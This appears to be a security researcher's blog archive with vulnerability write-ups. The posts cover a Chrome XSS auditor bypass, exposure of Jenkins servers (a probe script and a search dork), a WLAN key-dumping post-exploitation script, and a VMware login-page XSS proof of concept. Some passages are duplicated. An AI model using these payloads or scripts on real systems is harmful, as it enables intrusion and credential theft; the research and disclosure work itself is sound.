A couple of months ago, I discussed the configuration flaws present in deployments of the Jenkins software management application. The details are presented here: Jenkins Configuration Issues. Based on the same benchmark, I reported a few vulnerabilities in BlackBerry's infrastructure. Recently, I found that they added my name to the responsible disclosure list here: BlackBerry Responsible Disclosure List, which is fine as long as the team eradicates the vulnerabilities.
Nowadays, I do not perform aggressive vulnerability hunting (due to my ongoing job), but when I have time, I dissect components of widely used software and try to find flaws in them. I am more interested in cases where companies understand the problem and are ready to patch it; I am not inclined towards finding generic issues in websites that nobody cares about. I believe it is important to understand the consequences associated with a vulnerability when it is reported. It is also crucial to determine how an attacker can chain a set of bugs together for greater impact. If we don't understand the nitty-gritty details of a vulnerability, there is a high chance it will resurface.
In BlackBerry's case, unnecessary exposure of Jenkins components in the production environment could have resulted in problematic scenarios. The exposed Jenkins components were vulnerable to flaws such as injections, XSS, etc. So the belief is: "Expose Less and Be Secure !"
Note: I am going to report the Frame Injection vulnerability to the Jenkins team so that the issue can be patched. No details for now.
Enjoy !
Wednesday, January 01, 2014
Sunday, December 29, 2013
Web Application Design Does Matter - Google Chrome XSS Auditor Bypass : Version <= 32.0.1700.41 m Aura !
Update (6th March 2014): The post is also discussed on Stack Overflow here: https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms for additional discussion by the users.
Update: The bug has already been reported to the Google Chrome team. The details can be found here: https://code.google.com/p/chromium/issues/detail?id=330972. The team was not able to recreate the issue in their test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and was not in a position to reveal the details of that panel. Anyway, the bug is in "WontFix" state and Google Chrome is still vulnerable to these types of XSS bypasses.
Recently, I encountered an XSS auditor bypass in Google Chrome ( <= 32.0.1700.41 m Aura) while working on my research.
The XSS auditor in Google Chrome is a client-side XSS filter that blocks reflected XSS attacks right away. One point to take into consideration is that the design of the web application can also impact the working of the XSS auditor, creating scenarios that are not expected. Let's analyze a bypass in the latest (and earlier) versions of the Google Chrome browser.
Google Chrome Latest Version Tested !
The web page URL, http://www.example.com/index.php?m=login, generates the login form as follows:
For Injection, we crafted the URL as follows:
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login .In this injection, we have not injected in "m" parameter rather we have played with the URI structure. The idea is to tweak the form layout rather the value accepted by the "m" parameter. If you place your injection in "m" parameter, it gets nullified by the XSS Auditor. Let's see how the injection occurs:
As a result, Google Chrome XSS auditor is bypassed.
Inference: A few ideas should be taken into consideration:
1. The design of a web application impacts the XSS auditor.
2. Instead of always targeting the HTTP parameters, play around with the URI structure also.
Note: Internet Explorer blocked this vector.
Additional Readings: Check out the inside details of Google Chrome XSS Auditor:
- XSS Auditor Source Code : https://code.google.com/p/webkit-mirror/source/browse/Source/WebCore/html/parser/XSSAuditor.cpp
- More about XSS Auditor Read here: http://www.collinjackson.com/research/xssauditor.pdf
Enjoy !
Sunday, August 25, 2013
CCTV Cameras : An Interview for Fact or Fictional Show : Revision 3!
Recently, I did an interesting interview with Veronica from the Fact or Fictional show on the Internet. We discussed the issues and technology behind CCTV cameras.
Do not forget to watch the movie on this topic, "Closed Circuit", starring Eric Bana and Rebecca Hall!
Fact or Fiction Source: http://revision3.com/factorfictional/closed-circuit
Protect Your Software Development Web Interfaces - Information Lumps: A Case Study of Jenkins !
Automation of software development practices through applications has become the de facto standard in the software industry. Organizations are using support applications to reduce the workload involved in building and updating software. The basic idea behind this post is to check how security is structured for software management applications such as Jenkins in real-world scenarios, and what we need to look into while performing security assessments. Before discussing further, let's talk about Jenkins. According to the software website: "Jenkins is an application that monitors executions of repeated jobs, such as building a software project or jobs run by cron." For more details, you can read here: https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins.
From a software development perspective, Jenkins provides an integrated system that developers can use to manage software changes made to specific projects. It has been noticed that, although organizations use this software, misconfigured interfaces (not running behind a firewall, improper access rights) can have a substantial impact. From a security perspective, exposure of an integrated system that manages the software development model is a sensitive risk. To prove this point, a case study of the Jenkins application is discussed below, showing how misconfigured and exposed interfaces can result in potential security glitches.
These tests were conducted in an open environment. It has been found that several big companies use Jenkins and, with no surprise, their interfaces are exposed and running with improper authentication. In addition, a number of Jenkins systems are Internet-facing and expose a plethora of information to attackers (remote users). A misconfigured Jenkins server results in disclosure of critical information that can be used in different sets of attacks. A number of misconfiguration issues that result in information disclosure are presented below:
Note: Based on these security issues, a few vulnerabilities have been reported to industry leaders (organizations), which have recognized the problem. I will release the details once the issues are patched.
Developers Information: An exposed Jenkins interface reveals information about the developers participating in the software projects. It is possible to extract the user IDs of the registered accounts along with the associated names. This is a substantial starting point for gaining information about the users of a specific organization. An example of the exposed user details is shown below:
Exposed Developers Information !
Software Builds Information and Source Code: It is possible to gain information about the software builds without any authentication (in misconfigured scenarios). Information about the changes in the software over a period of time reveals the development flow of the components. The Jenkins application does not ask for any explicit permission from the administrators to validate the user before granting access to the ongoing software builds. An example is shown below:
Exposed Software Build and Version Numbers !
In certain scenarios, it is also possible to download the source code from Jenkins without any authentication. Although making changes to the code requires credentials, the fun part is that you can download the code without them. Take a look at the example shown below:
Source Code Files !
Server-side Information Disclosure in Environment Variables: Access to environment variables also provides a plethora of information. The example presented below shows significant information about the configured MySQL (JDBC) database server. The attacker can easily glean the username and password of the database (SONAR_JDBC_USERNAME and SONAR_JDBC_PASSWORD), including the internal IP address and the port number on which the JDBC service is running.
Revealed Environment Information !
Exposure of Application Secret Data: During analysis, it has been found that a number of server-side scripts have critical information such as secret keys and credentials hard-coded, which can be exposed when console-output operations are performed. The example below shows how a secret key is extracted by accessing the console output. In this example, the curl command uses a secret key to connect to a specific domain for fetching JSON data through a GET request. Once this information is exposed, the attacker can directly perform queries against the target domain.
Revealed Secret Key !
Cron Jobs Execution: It is also possible to start the cron jobs, which reveal a plethora of information due to the usage of debugging calls. The majority of the time, cron jobs produce a lot of output showing the success of the running software. The example shown below presents the creation of a database by a specific cron job in one of the vulnerable Jenkins configurations. It reveals how the table of OAuth tokens is created and the index is generated.
Information Leakage through Cron Jobs !
Information Disclosure in Debug Errors: During a quick check of certain Jenkins configurations, it has been noticed that the Jenkins server does not handle requests to restricted resources in a secure manner. The attacker can perform additional steps, requesting access to restricted resources to generate debug errors as shown below:
Information Disclosure in DEBUG Errors !
Some of the standard requests specific to Jenkins are shown below; a small probe sketch follows the list:
- For verifying whether anonymous access is allowed or not in Jenkins, the link can be fetched as: http://www.example.com/pview/
- To retrieve the system information, the attacker can try for: http://www.example.com/systeminf
- For accessing the script interface (command line access), one can try for: http://www.example.com/script
- To retrieve the Jenkins account signup webpage: http://www.example.com/signup
- For creating an account, send a direct request to: http://www.example.com/securityRealm/createAccount
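The probe sketch below (the host is a placeholder; the endpoints are the ones listed above) can be used to check which of these paths answer without authentication:

# Probe the assumed Jenkins paths and report the HTTP status codes.
import requests  # third-party library, assumed to be installed

BASE = "http://www.example.com"  # placeholder Jenkins host
PATHS = ["/pview/", "/systeminf", "/script", "/signup",
         "/securityRealm/createAccount"]

for path in PATHS:
    try:
        resp = requests.get(BASE + path, timeout=5, allow_redirects=False)
        print("{:40s} -> {}".format(path, resp.status_code))
    except requests.RequestException as exc:
        print("{:40s} -> error: {}".format(path, exc))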
Explicit CSRF Protection: It is always good practice to analyze the design of the application against security standards. Some security protections should be deployed in the application by default. For example, Jenkins provides a global security option in which protection against CSRF attacks has to be explicitly checked. If this option is not checked, the Jenkins application fails to deploy the protection globally. During our analysis, it has been noticed that a number of Jenkins systems are running without CSRF protection, which makes them vulnerable to critical web attacks.
Explicit Security Configuration !
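A rough remote check for this option (assuming the default Jenkins URL layout and anonymous read access) is to query the crumb issuer, which only answers when CSRF protection is enabled:

# Query the Jenkins crumb issuer; a 200 response indicates CSRF protection.
import requests

resp = requests.get("http://jenkins.example.com/crumbIssuer/api/json", timeout=5)
if resp.status_code == 200:
    print("CSRF protection appears enabled; crumb field:",
          resp.json().get("crumbRequestField"))
elif resp.status_code == 404:
    print("No crumb issuer found - CSRF protection is likely disabled")
else:
    print("Inconclusive response:", resp.status_code)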
SSH Endpoint Disclosure: Jenkins implements a random SSH port feature in which the software randomizes the port selection for running the SSH service. Typically, when a client sends a GET request, Jenkins replies with an "X-SSH-Endpoint" HTTP response header which leaks the information in the form host:port, meaning the SSH service is listening on the given host and port number. If the system is already exposed on the Internet, the attacker can easily glean the port number on which the SSH server is listening. A real-world example of a server running Jenkins is shown below:
SSH Endpoint Disclosure !
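Checking for this header is straightforward; a minimal sketch (placeholder host) is shown below:

# Fetch the Jenkins root page and read the X-SSH-Endpoint response header.
import requests

resp = requests.get("http://jenkins.example.com/", timeout=5)
endpoint = resp.headers.get("X-SSH-Endpoint")
print("Advertised SSH endpoint:", endpoint if endpoint else "not disclosed")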
The information discussed in this post only provides a glimpse of the security risks associated with poorly administered software management applications. These applications can give attackers a substantial amount of information about the organization and the server-side environment, which facilitates additional attacks.
For replicating the issues, use the Google dork intitle:"Dashboard [Jenkins]" to get a list of Jenkins servers available on the Internet.
Impacts: As shown above, misconfigured software management applications can have severe impacts, as discussed below:
- Information about developers can be used to conduct phishing attacks, including social engineering trickery, to launch targeted attacks.
- The common mistake of not enabling CSRF protection exposes the Jenkins environment to a number of critical web vulnerabilities such as cross-site file uploading.
- Inappropriate error handling discloses information about stack traces and internal components of the software.
- Unrestricted cron jobs result in the successful running of different builds of the software. As shown above, information disclosed in the console output leads to leakage of sensitive data such as secret keys, which the attacker can use to attack target servers.
- Disclosure of software build information provides an attacker with complete knowledge of the updates and modifications that have taken place in the software. This information is beneficial for hunting security vulnerabilities or for design analysis.
Recommendations:
- For software development and management interfaces, restrict access completely. It is highly recommended that the server be configured with full authentication, meaning no functionality of the application should be accessible without authentication or in a default state.
- Simply removing the HTTP links from interfaces is not a robust way to restrict access: the links can be fuzzed easily to gain access to hidden functionality. Deploy security features using a global configuration.
- Standard security protection mechanisms should be enabled by default, without asking for any preferences from the users or administrators.
- Administrators should verify new account creation in software like Jenkins before access is granted to the registered user.
Configure Well and Be Secure!
Sunday, August 04, 2013
BlackHat USA Arsenal 2013 : Sparty - A FrontPage and SharePoint Security Auditing Tool
Last week, I released the first version of the Sparty tool at BlackHat USA Arsenal 2013. The tool helps penetration testers check for standard security flaws in deployments of FrontPage and SharePoint web software. The tool is an outcome of the security issues that have been found in wide deployments of this software.
I had an interesting discussion with Tom Gallagher from Microsoft, who has worked on FrontPage and SharePoint security and related developments. I got very good feedback, which I will incorporate into the next release. Gursev also provided some impressive points which I will work on.
Sparty is hosted here : http://sparty.secniche.org/
Enjoy and feel free to provide any feedback.
Wednesday, July 17, 2013
Internal IP Address Disclosure over HTTP Protocol Channel : Information Revealing Headers !
The disclosure of internal IP addresses to remote users reveals a substantial layout of the organizational network. It is highly advised that web servers should not disclose internal IP addresses in HTTP response headers. In real-world scenarios, this is often not the case: the majority of web servers, load-balancing devices, and web applications disclose this information. This post discusses the different ways in which internal IP addresses are revealed over the HTTP protocol.
You can read more about HTTP 1.1 specifications and working here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
1. Location Response-Header Field: This response header is used to redirect the HTTP request to a new location. With a 201 response code, it points to the resource dynamically created during the request. With a 3xx (redirection: 301, 302, 303, 304, 305, 306, 307) response, its value identifies the location preferred by the web server.
2. Content-Location: Similarly, the Content-Location response header can also disclose the internal IP address. This header presents a location for the resource when it is accessible at a URI separate from the one requested. There is a known issue in IIS web servers which reveal the internal IP address in the Content-Location header while redirecting the browser. More details can be read here: http://www.rapid7.com/vulndb/lookup/http-iis-0065
There is a difference in the usage of the Location and Content-Location HTTP response headers. For reference, you can read this blog entry: http://www.subbu.org/blog/2008/10/location-vs-content-location.
3. Via Header Field: This HTTP response header is added by gateways and proxies present between the client (user agents, i.e. browsers) and the web server. The basic functionality of the Via header field is to track message forwarding, avoid loops during processing, and identify protocol capabilities. Generally, this header reveals the internal IP address of the configured gateway or proxy, as shown below:
4. X-Cache Header: This response header is set by transparent proxies deployed as intermediate agents between the client and the server. The idea is to reduce the direct load on the website by placing a copy in the cache and responding with it when an HTTP request is initiated by the client. Transparent proxies have other functionality as well. The internal IP address can be revealed in the two scenarios discussed below:
4.1 X-Cache Miss: When the transparent proxy does not have a local copy of the website or web pages requested by the client.
4.2 X-Cache Hit: When the transparent proxy has a local copy of the website or requested web pages.
You can read more about the X-Cache headers here: http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/
5. Set-Cookie Header: A number of load-balancing devices use Set-Cookie to set custom content as part of the communication channel to activate the session with the backend web server. The internal IP address can also be disclosed as part of the Set-Cookie parameter. A simple example is BIG-IP devices, which reveal the internal IP address in a binary-encoded form. By default, BIG-IP devices handle HTTP connection pooling based on IP addresses. In the screenshot shown below, the pool parameter holds the value of the internal IP address.
In my earlier presentations (a couple of years ago), I talked about extracting the IP address from the BIG-IP http_pool Set-Cookie parameter. The concept is shown below.
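For reference, a small decoder sketch is shown below; it assumes the standard BIG-IP persistence cookie layout (IP address as a little-endian unsigned 32-bit integer, followed by a byte-swapped port, followed by "0000"):

# Decode a BIG-IP persistence cookie value into an internal IP and port.
import socket
import struct

def decode_bigip_cookie(value):
    ip_enc, port_enc, _ = value.split(".")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_enc)))            # reverse byte order
    port = struct.unpack("<H", struct.pack(">H", int(port_enc)))[0]  # swap port bytes
    return ip, port

print(decode_bigip_cookie("1677787402.36895.0000"))  # -> ('10.1.1.100', 8080)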
These are some of the HTTP headers over which internal IPs are exposed. During deployment, one should verify and validate that these headers do not expose unnecessary information.
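As a quick way to audit a deployment for these leaks, a simple sketch such as the following (placeholder URL, basic RFC 1918 pattern) can flag suspicious response headers:

# Flag response headers that contain a private (RFC 1918) IP address.
import re
import requests

PRIVATE_IP = re.compile(
    r"\b(10\.\d{1,3}|172\.(1[6-9]|2\d|3[01])|192\.168)\.\d{1,3}\.\d{1,3}\b")

resp = requests.get("http://www.example.com/", timeout=5)
for name, value in resp.headers.items():
    if PRIVATE_IP.search(value):
        print("Possible internal IP in {}: {}".format(name, value))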
Note: If anyone has additional information regarding internal IP address disclosure over the HTTP channel, let me know and I will update this entry. The idea is to collect all the vectors.
Enjoy!
Labels:
Big IP,
HTTP Protocol,
Internal IP Disclosure,
Set-Cookie,
Via,
X-Cache Hit,
X-Cache Miss
Monday, May 20, 2013
Contrarisk Security Podcast Series: A Talk on Socioware!
I recently did a podcast on Socioware with Steve from Contrarisk.
"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."
Listen to the podcast here: http://contrarisk.com/2013/05/19/csp-0011/
Saturday, May 04, 2013
ToorCon 14 (2012) : Malandroid - The Crux of Android Infections
The talk I gave on Android malware at ToorCon 14.
Labels:
Android Malware,
Chinese Malware,
Mobile Bots,
Mobile Malware,
ToorCon
Saturday, April 27, 2013
(Pentest Apache #3) - The Nature of # (%23) Character | Mod Security Rules in Apache
1. (Pentest Apache #1) Exposed Apache Axis - SOAP Objects
2. (Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security
In this post, I want to discuss an interesting issue that occurs due to misconfigured URL rewriting rules (discussed here in the context of mod_security deployments). It is not a severe issue, but it helps the penetration tester gain some additional information about the server-side environment, for example, directory listings.
Here, NE stands for "No Escape" (an Apache rewrite-rule flag). One can explicitly configure rules with this flag to disable escaping. For example, "#" will be converted to "%23" if the NE flag is not set; if the NE flag is set, the "#" character is passed through as-is and processed accordingly. For more about these flags, refer here: http://httpd.apache.org/docs/2.2/rewrite/flags.html. An example taken from there:
"RewriteRule ^/anchor/(.+) /bigpage.html#$1 [NE,R]. This example will redirect /anchor/xyz to /bigpage.html#xyz."
If escaping is not set properly, in combination with other misconfiguration issues, it can result in unexpected behavior. I have noticed this flaw plenty of times during security assessments. Let's have a look at a real-world example:
URL pattern 1: http://www.example.com/temp/#htaccess.cl
URL pattern 2: http://www.example.com/temp/%23htaccess.cl
In case (1), if the NE flag is set, the URL is processed with the "#" character. In case (2), if the NE flag is not set, the URL is processed with "%23", the hexadecimal notation of the "#" character. But due to misconfiguration, the behavior changes.
The tested server is Apache/2.2.14. Both URLs are answered with 200 OK responses. In case (1), the output is a directory listing. In case (2), the output is the content of the file htaccess.cl.
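The behavior can be reproduced with a few lines of Python (placeholder host); http.client is used because it sends the request path exactly as given, so the literal "#" actually reaches the server instead of being treated as a fragment on the client side:

# Request both the raw "#" form and the "%23" form and compare the responses.
import http.client

for path in ("/temp/#htaccess.cl", "/temp/%23htaccess.cl"):
    conn = http.client.HTTPConnection("www.example.com", timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    print(path, resp.status, resp.getheader("Content-Type"))
    conn.close()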
Case 1: Content-Type is text/html;charset=UTF-8
With # Character
With %23 Character
One reason could be that the file name starts with the "#" character. But the primary reason is Apache's inability to handle misconfigured URL rewriting rules. Usually, if a URL rewriting rule fails, the web server should respond with a 404 error message. In case of misconfiguration, the fallback step is the directory listing, at least that is what I have seen in practical scenarios (it could be different).
Inference: Play around with URL rewriting rules to detect bypasses which could result in gleaning additional information.
Tuesday, April 09, 2013
A Sweet Script to Dump Keys from Wlan Profiles - Post Exploitation (or Regular Use)
Update: Just found that PaulDotCom has written about this blog post in episode 327: http://pauldotcom.com/wiki/index.php/Episode327.
"This is a great example of so many things. First, its a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just caughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and its one of the toughest things to understand, until you have a pen test."
After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even small automation is productive. Running the same command several times is not bad, but it is better to take the next step.
The script presented below helps dump the security keys for all the WLAN profiles present on the compromised system (if you have administrator access). I use this sweet script to do the work, so use it whenever you want.
"This is a great example of so many things. First, its a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just caughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and its one of the toughest things to understand, until you have a pen test."
After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even a small automation is productive. Running a same command several times is not bad but its better to take a next step.
The below presented script helps to dump security keys for all the wlan profiles present on the compromised system (if you have an administrator access). I use this sweet script to do the work so use it when ever you want.
Wlan Profiles - Security Keys Dumping Script
It outputs as:
Fetch the batch script from here: http://www.secniche.org/tools/dump_wlan_config.txt
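For reference, a rough Python equivalent of the same idea is sketched below (the original batch script is at the link above); it assumes a Windows host with administrator rights, and the parsing of the English netsh output is deliberately simplistic:

# Enumerate WLAN profiles via netsh and print the stored key for each one.
import re
import subprocess

out = subprocess.run(["netsh", "wlan", "show", "profiles"],
                     capture_output=True, text=True).stdout
profiles = [p.strip() for p in re.findall(r"All User Profile\s*:\s*(.+)", out)]

for name in profiles:
    detail = subprocess.run(
        ["netsh", "wlan", "show", "profile", name, "key=clear"],
        capture_output=True, text=True).stdout
    key = re.search(r"Key Content\s*:\s*(.+)", detail)
    print(name, "->", key.group(1).strip() if key else "no key found")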
Enjoy !
Labels:
Hacking,
Wireless Keys,
Wlan keys dumping
Tuesday, March 26, 2013
Responsible Disclosure : XSS in Damballa Reported and Patched !
Last weekend, I was reading some research papers available on the Damballa website, which are awesome without any doubt. While surfing the website, to my surprise, I found an XSS vulnerability in it. Since Damballa provides anti-malware solutions, the XSS could be used for malicious purposes. Under responsible disclosure constraints, I contacted David Holmes of Damballa and revealed the issue. What makes responsible disclosure interesting is a prompt reply from a vendor willing to patch the vulnerability without any complexities. The same happened with Damballa: they patched the bug right away. In addition, I had a good discussion with David Holmes about why the issue persisted on the website.
I expect that every vendor should be prompt enough to patch the issue.
Proof-of-Concept (PoC):
Be responsible in disclosing bugs.
Labels:
Damballa Inc,
Responsible Disclosure,
XSS
Sunday, January 27, 2013
VMware Management Interface - A Little Story of XSS
As a part of my open research, I came across an XSS vulnerability in the VMware management interface used by VMware ESX and GSX servers. I thought it might be a new issue, but interestingly, a number of XSS issues have already been reported to the VMware security team. The list can be found here: http://www.cvedetails.com/vulnerability-list/vendor_id-252/opxss-1/Vmware.html
On another note, a number of VMware management interfaces exposed on the Internet are still vulnerable; of course, the administrators have not deployed patches or upgraded the required software. I didn't find enough details on the XSS issue (maybe I missed them), so I thought I would talk about the issue in detail here. I am not going to list which versions are affected; you can get that information from the advisories. The management interface looks as presented below:
VMware Management Interface
The username and password fields are given the ids "l" and "m" respectively. Interestingly, the vulnerable interfaces use client-side encoding to obfuscate the input values entered by the user. But this can be taken care of by using a proxy: the value can be passed directly without encoding (alter the HTTP request and POST parameters in a proxy such as Burp, Charles, etc.). For example, if you specify the parameters as follows:
l="/>"/>"/><script>alert(document.cookie);</script>
m=test
it gets encoded as follows:
l = Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
m = dGVzdA==
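A couple of lines of standard-library Python confirm what the client-side code is doing to the submitted values:

# Reproduce the client-side transformation: it is plain Base64.
import base64

print(base64.b64encode(b'"/>"/>"/><script>alert(document.cookie);</script>').decode())
# -> Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
print(base64.b64encode(b"test").decode())  # -> dGVzdA==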
As the snippet confirms, it is not a complex encoding, only Base64. At first glance, even if one uses a proxy to pass the values, the client-side work means the XSS payload fails to render in the web page. The output looks as follows:
<html><head><title>Login: VMware Management Interface</title><script> var user="Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
It reflects back our XSS payload, but in Base64-encoded form, which renders as useless data. The vulnerability lies in the handling of these parameters on the server side: whatever payload the server receives is reflected back without any additional modification. The server does not perform any encoding or input validation; it is all client-side. The idea, then, is simply to deliver the payload without encoding. All POST requests are handled by /sx-login/index.pl. Let's see:
(Request-Line) POST /sx-login/index.pl HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://82.133.251.1/vmware/en/login.html
Cookie: vmware.mui.test=1; vmware.mui.test=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
The simple proof of concept (PoC) shown below sends the request directly to /sx-login/index.pl without any encoding, which makes the XSS work.
<html>
<body>
<form name="k" id="k" method="post" action="https://example.com/sx-login/index.pl" target="data">
<input name="l" type="text" value='"--></style></script><script>alert(document.location);</script>"'/>
<input name="m" type="password" value="test"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
Once this form is successfully submitted, it results in XSS as shown below:
<html><head><title>Login: VMware Management Interface</title><script>
var user=""--></style></script><script>alert(document.location);</script>"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
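The same direct POST can also be issued from a script instead of the HTML form; a minimal sketch is shown below (placeholder host; certificate verification is disabled because these interfaces typically run with self-signed certificates):

# Send the unencoded payload straight to the login handler.
import requests

payload = {
    "l": '"--></style></script><script>alert(document.location);</script>"',
    "m": "test",
}
resp = requests.post("https://example.com/sx-login/index.pl",
                     data=payload, verify=False)
print(resp.text)  # the payload is reflected, unencoded, in the "user" variable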
On patched systems, the web server replied back as follows:
<html><head><title>Login: VMware Management Interface</title><script>
var user="\"--\u003E\u003C/style\u003E\u003C/script\u003E\u003Cscript\u003Ealert(document.location);\u003C/script\u003E\"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null; </script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
The patched versions now use server-side Unicode escaping to defeat the XSS payload.
Enjoy!
l="/>"/>"/><script>alert(document.cookie);</script>
m=test
it gets encoded as follows:
l = Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
m = dGVzdA==
Well, its not a complex encoding but only a Base 64 encoding. Even if, one uses the proxy to pass the values without encoding, due to client side work, the XSS payload fails to render in the webpage. The output looks like as follows:
<html><head><title>Login: VMware Management Interface</title><script> var user="Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
It reflects back our XSS payload but in Base 64 encoded format which is rendered as useless data. The vulnerability persisted in the handling of these parameters on the server side. If you check, the same payload is reflected back without any additional modification. Actually, the server does not perform any encoding or input validation. Its all client side. The idea is to simply render this payload without encoding. All the POST requests are handled by the /sx-login/index.pl. Let's see:
(Request-Line) POST /sx-login/index.pl HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://82.133.251.1/vmware/en/login.html
Cookie: vmware.mui.test=1; vmware.mui.test=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
The simple proof of concept (PoC) that directly sends request to the /sx/login/index.pl is shown below which queries directly without any encoding and made the XSS work.
<html>
<body>
<form name="k" id="k" method="post" action="https://example.com/sx-login/index.pl" target="data">
<input name="l" type="text" value='"--></style></script><script>alert(document.location);</script>"'/>
<input name="m" type="password" value="test"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
Once this form is successfully submitted, it results in XSS as shown below:
<html><head><title>Login: VMware Management Interface</title><script>
var user=""--></style></script><script>alert(document.location);</script>"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;
</script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
Successful XSS Injection |
<html><head><title>Login: VMware Management Interface</title><script>
var user="\"--\u003E\u003C/style\u003E\u003C/script\u003E\u003Cscript\u003Ealert(document.location);\u003C/script\u003E\"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null; </script></head><body bgcolor="#336699" onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html>
The patched versions are now using server side unicode encoding to subvert the XSS payload.
Enjoy!
Labels:
Vmware ESX,
VMware GSX,
VMware Security,
XSS